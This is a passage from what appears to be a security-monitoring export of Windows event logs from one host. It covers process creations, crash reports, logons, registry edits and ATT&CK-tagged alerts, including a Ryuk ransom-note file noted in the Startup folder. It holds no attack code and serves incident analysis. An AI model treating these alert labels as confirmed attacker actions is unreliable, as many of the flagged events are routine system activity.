Williams\r\nLogonGuid: {df9fc3d3-5f4e-5ea5-0000-002083730300}\r\nLogonId: 0x37383\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=F7DC8A74E30E08B9510380274CFB9288,SHA256=C5E88D778C0B118D49BEF467ED059C09B61DEEA505D2A3D5CA1DCC0A5CDF752F,IMPHASH=FE6F775DD0C72FFD106F56930C60A452\r\nParentProcessGuid: {df9fc3d3-5f7f-5ea5-0000-0010397f0e00}\r\nParentProcessId: 8684\r\nParentImage: C:\\Windows\\System32\\sihost.exe\r\nParentCommandLine: sihost.exe\""""},""eventdata"":{""utcTime"":""2020-04-26 10:16:37.011"",""processGuid"":""{df9fc3d3-5f85-5ea5-0000-0010fecb0e00}"",""processId"":""8948"",""image"":""C:\\\\Windows\\\\explorer.exe"",""fileVersion"":""10.0.18362.693 (WinBuild.160101.0800)"",""description"":""Windows Explorer"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""EXPLORER.EXE"",""commandLine"":""explorer.exe /LOADSAVEDWINDOWS"",""currentDirectory"":""C:\\\\Windows\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-5f4e-5ea5-0000-002083730300}"",""logonId"":""0x37383"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=F7DC8A74E30E08B9510380274CFB9288,SHA256=C5E88D778C0B118D49BEF467ED059C09B61DEEA505D2A3D5CA1DCC0A5CDF752F,IMPHASH=FE6F775DD0C72FFD106F56930C60A452"",""parentProcessGuid"":""{df9fc3d3-5f7f-5ea5-0000-0010397f0e00}"",""parentProcessId"":""8684"",""parentImage"":""C:\\\\Windows\\\\System32\\\\sihost.exe"",""parentCommandLine"":""sihost.exe""}}}","""Process Create:
+RuleName:
+UtcTime: 2020-04-26 10:16:37.011
+ProcessGuid: {df9fc3d3-5f85-5ea5-0000-0010fecb0e00}
+ProcessId: 8948
+Image: C:\Windows\explorer.exe
+FileVersion: 10.0.18362.693 (WinBuild.160101.0800)
+Description: Windows Explorer
+Product: Microsoft® Windows® Operating System
+Company: Microsoft Corporation
+OriginalFileName: EXPLORER.EXE
+CommandLine: explorer.exe /LOADSAVEDWINDOWS
+CurrentDirectory: C:\Windows\
+User: DESKTOP-HUE026H\John Williams
+LogonGuid: {df9fc3d3-5f4e-5ea5-0000-002083730300}
+LogonId: 0x37383
+TerminalSessionId: 1
+IntegrityLevel: Medium
+Hashes: MD5=F7DC8A74E30E08B9510380274CFB9288,SHA256=C5E88D778C0B118D49BEF467ED059C09B61DEEA505D2A3D5CA1DCC0A5CDF752F,IMPHASH=FE6F775DD0C72FFD106F56930C60A452
+ParentProcessGuid: {df9fc3d3-5f7f-5ea5-0000-0010397f0e00}
+ParentProcessId: 8684
+ParentImage: C:\Windows\System32\sihost.exe
+ParentCommandLine: sihost.exe"""
+"Apr 26, 2020 @ 10:17:06.577",9,"Windows Application error event",,"""Faulting application name: GameBar.exe, version: 3.38.2002.25003, time stamp: 0x5e5615f2
+Faulting module name: ucrtbase.dll, version: 10.0.18362.387, time stamp: 0x4361b720
+Exception code: 0xc0000409
+Fault offset: 0x000000000006db8e
+Faulting process id: 0x1980 +Faulting application start time: 0x01d61bb3b2703aee +Faulting application path: C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_3.38.25003.0_x64__8wekyb3d8bbwe\GameBar.exe +Faulting module path: C:\Windows\System32\ucrtbase.dll +Report Id: 440a54a0-304d-4b82-9310-8d86ef000ed6 +Faulting package full name: Microsoft.XboxGamingOverlay_3.38.25003.0_x64__8wekyb3d8bbwe +Faulting package-relative application ID: App""" +"Apr 26, 2020 @ 10:17:04.550",4,"Summary event of the report's signatures",,"""Fault bucket 2039954016612560073, type 5 +Event Name: MoAppCrash +Response: Not available +Cab Id: 0 + +Problem signature: +P1: Microsoft.Windows.StartMenuExperienceHost_10.0.18362.449_neutral_neutral_cw5n1h2txyewy +P2: praid:App +P3: 0.0.0.0 +P4: 5d65fb6a +P5: ntdll.dll +P6: 10.0.18362.719 +P7: 64d10ee0 +P8: c0000005 +P9: 000000000003b890 +P10: + +Attached files: +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERCEB.tmp.dmp +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER147E.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER152B.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER15E8.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER1676.tmp.txt + +These files may be available here: +\\?\C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_a517d33c7366c0ce7a4123d7394238d757255f3_df0fc392_af1e1e87-f07b-4530-9ff2-e8b6c0c3dcb8 + +Analysis symbol: +Rechecking for solution: 0 +Report Id: 260ea8f4-adf4-4f0d-9e46-8111c7d560d2 +Report Status: 268435456 +Hashed bucket: 28406508ca41bd6f7c4f5f5eb652acc9 +Cab Guid: 0""" +"Apr 26, 2020 @ 10:17:04.536",4,"Summary event of the report's signatures",,"""Fault bucket 1416303988536420219, type 4 +Event Name: APPCRASH +Response: Not available +Cab Id: 0 + +Problem signature: +P1: sihost.exe +P2: 10.0.18362.1 +P3: e9587576 +P4: ntdll.dll +P5: 10.0.18362.719 +P6: 64d10ee0 +P7: c0000005 +P8: 000000000003b890 +P9: +P10: + +Attached files: 
+\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER4FC.tmp.dmp +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER972.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER9E0.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERA2D.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERBF4.tmp.txt + +These files may be available here: +\\?\C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_sihost.exe_8e8a7b3a9516eb3355c5fecfc9f15289a25db9f_b8434f32_89841dbc-f4e5-45fc-b768-3fa2593fc0bd + +Analysis symbol: +Rechecking for solution: 0 +Report Id: 4493f23c-1383-4193-92c2-789b4c7cd9c2 +Report Status: 268435456 +Hashed bucket: 2530936a9b385b37a3a7b8f942aea77b +Cab Guid: 0""" +"Apr 26, 2020 @ 10:17:02.850",4,"Summary event of the report's signatures",,"""Fault bucket 2258116575438203359, type 5 +Event Name: FaultTolerantHeap +Response: Not available +Cab Id: 0 + +Problem signature: +P1: StartMenuExperienceHost.exe +P2: 0.0.0.0 +P3: 5D65FB6A +P4: ffffbaad +P5: +P6: +P7: +P8: +P9: +P10: + +Attached files: +\\?\C:\Windows\SERVIC~1\LOCALS~1\AppData\Local\Temp\FTH913.tmp\fthempty.txt +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER914.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER963.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER9CE.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERA8C.tmp.txt + +These files may be available here: + + +Analysis symbol: +Rechecking for solution: 0 +Report Id: 59f7bd84-49ca-4b99-b1c9-a6339bb10df8 +Report Status: 268435456 +Hashed bucket: ea03c7813111befe0f56710fb46a69df +Cab Guid: 0""" +"Apr 26, 2020 @ 10:16:50.899",9,"Windows Application error event",,"""Faulting application name: StartMenuExperienceHost.exe, version: 0.0.0.0, time stamp: 0x5d65fb6a +Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x64d10ee0 +Exception code: 0xc0000005 +Fault offset: 0x000000000003b890 +Faulting process id: 0x10fc +Faulting application start time: 
0x01d61bb3a7db3186 +Faulting application path: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe +Faulting module path: C:\Windows\SYSTEM32\ntdll.dll +Report Id: 260ea8f4-adf4-4f0d-9e46-8111c7d560d2 +Faulting package full name: Microsoft.Windows.StartMenuExperienceHost_10.0.18362.449_neutral_neutral_cw5n1h2txyewy +Faulting package-relative application ID: App""" +"Apr 26, 2020 @ 10:16:50.378",9,"Windows Application error event",,"""Volume Shadow Copy Service information: The COM Server with CLSID {e579ab5f-1cc4-44b4-bed9-de0991ff0623} and name Coordinator cannot be started. [0x80070005, Access is denied. +] """ +"Apr 26, 2020 @ 10:16:46.081",9,"Windows Application error event",,"""Faulting application name: sihost.exe, version: 10.0.18362.1, time stamp: 0xe9587576 +Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x64d10ee0 +Exception code: 0xc0000005 +Fault offset: 0x000000000003b890 +Faulting process id: 0xdd4 +Faulting application start time: 0x01d61bb3a566fdbc +Faulting application path: C:\Windows\system32\sihost.exe +Faulting module path: C:\Windows\SYSTEM32\ntdll.dll +Report Id: 4493f23c-1383-4193-92c2-789b4c7cd9c2 +Faulting package full name: +Faulting package-relative application ID: """ +"Apr 26, 2020 @ 10:16:39.896",3,"Windows Logon Success",,"""An account was successfully logged on. 
+ +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. 
+ - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 26, 2020 @ 10:16:06.575",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. 
+ +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 26, 2020 @ 10:16:02.231",5,"License Activation (slui.exe) failed",,"""License Activation (slui.exe) failed with the following error code: +hr=0x803F7001 +Command-line arguments: +RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2b1f36bb-c1cd-4306-bf5c-a0367c2d97d8;NotificationInterval=1440;Trigger=TimerEvent""" +"Apr 26, 2020 @ 10:16:01.886",5,"License Activation (slui.exe) failed",,"""License Activation (slui.exe) failed with the following error code: +hr=0x803F7001 +Command-line arguments: +RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2b1f36bb-c1cd-4306-bf5c-a0367c2d97d8;NotificationInterval=1440;Trigger=UserLogon;SessionId=1""" +"Apr 26, 2020 @ 10:16:01.217",12,"ATT&CK T1060: Potential Persistence Method via Startup Folder","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""11"",""version"":""2"",""level"":""4"",""task"":""11"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:58.872807000Z"",""eventRecordID"":""865"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""File created:\r\nRuleName: T1023\r\nUtcTime: 2020-04-26 10:15:58.858\r\nProcessGuid: 
{df9fc3d3-5f49-5ea5-0000-00100efa0100}\r\nProcessId: 2148\r\nImage: C:\\Program Files (x86)\\ossec-agent\\ossec-agent.exe\r\nTargetFilename: C:\\Program Files (x86)\\ossec-agent\\queue\\diff\\local\\users\\john williams\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\ryukreadme.html\\last-entry\r\nCreationUtcTime: 2020-04-26 10:15:58.858\""""},""eventdata"":{""ruleName"":""T1023"",""utcTime"":""2020-04-26 10:15:58.858"",""processGuid"":""{df9fc3d3-5f49-5ea5-0000-00100efa0100}"",""processId"":""2148"",""image"":""C:\\\\Program Files (x86)\\\\ossec-agent\\\\ossec-agent.exe"",""targetFilename"":""C:\\\\Program Files (x86)\\\\ossec-agent\\\\queue\\\\diff\\\\local\\\\users\\\\john williams\\\\appdata\\\\roaming\\\\microsoft\\\\windows\\\\start menu\\\\programs\\\\startup\\\\ryukreadme.html\\\\last-entry"",""creationUtcTime"":""2020-04-26 10:15:58.858""}}}","""File created: +RuleName: T1023 +UtcTime: 2020-04-26 10:15:58.858 +ProcessGuid: {df9fc3d3-5f49-5ea5-0000-00100efa0100} +ProcessId: 2148 +Image: C:\Program Files (x86)\ossec-agent\ossec-agent.exe +TargetFilename: C:\Program Files (x86)\ossec-agent\queue\diff\local\users\john williams\appdata\roaming\microsoft\windows\start menu\programs\startup\ryukreadme.html\last-entry +CreationUtcTime: 2020-04-26 10:15:58.858""" +"Apr 26, 2020 @ 10:15:57.231",9,"Windows Application error event",,"""Failure to load the application settings for package Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy. Error Code: -2147023879""" +"Apr 26, 2020 @ 10:15:56.574",5,"SCA summary: Benchmark for Windows audit: Score less than 80% (66)",, +"Apr 26, 2020 @ 10:15:53.411",3,"Windows Logon Success",,"""An account was successfully logged on. 
+ +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. 
+ - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 26, 2020 @ 10:15:53.284",3,"The Windows Search Service started",,"""The Windows Search Service started. +""" +"Apr 26, 2020 @ 10:15:53.256",3,"The database engine attached a database",,"""SearchIndexer (4212,D,50) Windows: The database engine attached a database (1, C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb). (Time=0 seconds) + +Saved Cache: 0 0 +Additional Data: lgposAttach = 00000014:000D:0268, +dbv = 1568.20.0 + +Internal Timing Sequence: +[1] 0.000007 +J(0) +M(C:0K, Fs:1, WS:4K # 0K, PF:0K # 0K, P:0K) +[2] 0.000533 -0.000242 (1) WT +J(0) +M(C:0K, Fs:26, WS:36K # 0K, PF:32K # 0K, P:32K) +[3] 0.019551 -0.014157 (6) WT +J(CM:0, PgRf:0, Rd:0/0, Dy:0/0, Lg:3480/2) +M(C:0K, Fs:43, WS:132K # 0K, PF:148K # 0K, P:148K) +[4] 0.000143 +J(0) +[5] - +[6] - +[7] - +[8] 0.002402 -0.001095 (2) CM +J(CM:2, PgRf:2, Rd:14/2, Dy:0/0, Lg:0/0) +M(C:0K, Fs:53, WS:208K # 0K, PF:664K # 0K, P:664K) +[9] 0.034636 -0.000268 (5) CM -0.033900 (2) WT +J(CM:5, PgRf:23, Rd:0/5, Dy:0/0, Lg:0/0) +M(C:0K, Fs:67, WS:268K # 0K, PF:256K # 140K, P:256K) +[10] 0.000219 -0.000091 (1) CM +J(CM:1, PgRf:40, Rd:0/1, Dy:0/0, Lg:0/0) +M(C:0K, Fs:11, WS:44K # 16K, PF:96K # 96K, P:96K) +[11] 0.000016 +J(CM:0, PgRf:1, Rd:0/0, Dy:0/0, Lg:0/0) +M(C:0K, Fs:4, WS:16K # 16K, PF:0K # 0K, P:0K) +[12] 0.000046 +J(CM:0, PgRf:42, Rd:0/0, Dy:0/0, Lg:0/0) +M(C:0K, Fs:3, WS:12K # 12K, PF:0K # 0K, P:0K) +[13] 0.000001 +J(0) +[14] 0.0 +J(0) +[15] 0.000006 +J(CM:0, PgRf:1, Rd:0/0, Dy:0/0, Lg:0/0).""" +"Apr 26, 2020 @ 10:15:53.178",3,"The database engine is starting a new instance",,"""SearchIndexer (4212,P,98) Windows: The database engine (10.00.18363.0000) is starting a new instance (0).""" +"Apr 26, 2020 @ 10:15:51.059",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic 
Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed",, +"Apr 26, 2020 @ 10:15:50.170",5,"Windows audit failure event",,"""Cryptographic operation. + +Subject: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x37383 + +Cryptographic Parameters: + Provider Name: Microsoft Software Key Storage Provider + Algorithm Name: UNKNOWN + Key Name: Microsoft Connected Devices Platform device certificate + Key Type: User key. + +Cryptographic Operation: + Operation: Open Key. + Return Code: 0x80090016""" +"Apr 26, 2020 @ 10:15:50.121",5,"Windows audit failure event",,"""Cryptographic operation. + +Subject: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x37383 + +Cryptographic Parameters: + Provider Name: Microsoft Software Key Storage Provider + Algorithm Name: UNKNOWN + Key Name: Microsoft Connected Devices Platform device certificate + Key Type: User key. + +Cryptographic Operation: + Operation: Open Key. + Return Code: 0x80090016""" +"Apr 26, 2020 @ 10:15:50.090",5,"Windows audit failure event",,"""Cryptographic operation. + +Subject: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x37383 + +Cryptographic Parameters: + Provider Name: Microsoft Software Key Storage Provider + Algorithm Name: UNKNOWN + Key Name: Microsoft Connected Devices Platform device certificate + Key Type: User key. + +Cryptographic Operation: + Operation: Open Key. 
+ Return Code: 0x80090016""" +"Apr 26, 2020 @ 10:15:49.863",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.734923100Z"",""eventRecordID"":""852"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.717\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\TabletInputService\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:15:44.717"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\TabletInputService\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.717 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\TabletInputService\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:15:49.050",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.291850300Z"",""eventRecordID"":""846"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.233\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\WpnUserService_3ddcb\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:15:44.233"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\WpnUserService_3ddcb\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.233 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\WpnUserService_3ddcb\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 26, 2020 @ 10:15:49.003",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.291552300Z"",""eventRecordID"":""845"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.233\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\WpnUserService_3ddcb\\Start\r\nDetails: DWORD (0x00000002)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:15:44.233"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\WpnUserService_3ddcb\\\\Start"",""details"":""DWORD (0x00000002)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.233 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\WpnUserService_3ddcb\Start +Details: DWORD (0x00000002)""" +"Apr 26, 2020 @ 10:15:48.931",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.290429400Z"",""eventRecordID"":""844"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.233\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\UserDataSvc_3ddcb\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:15:44.233"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\UserDataSvc_3ddcb\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.233 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\UserDataSvc_3ddcb\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 26, 2020 @ 10:15:48.913",9,"ATT&CK T1058:Registry edit for new 
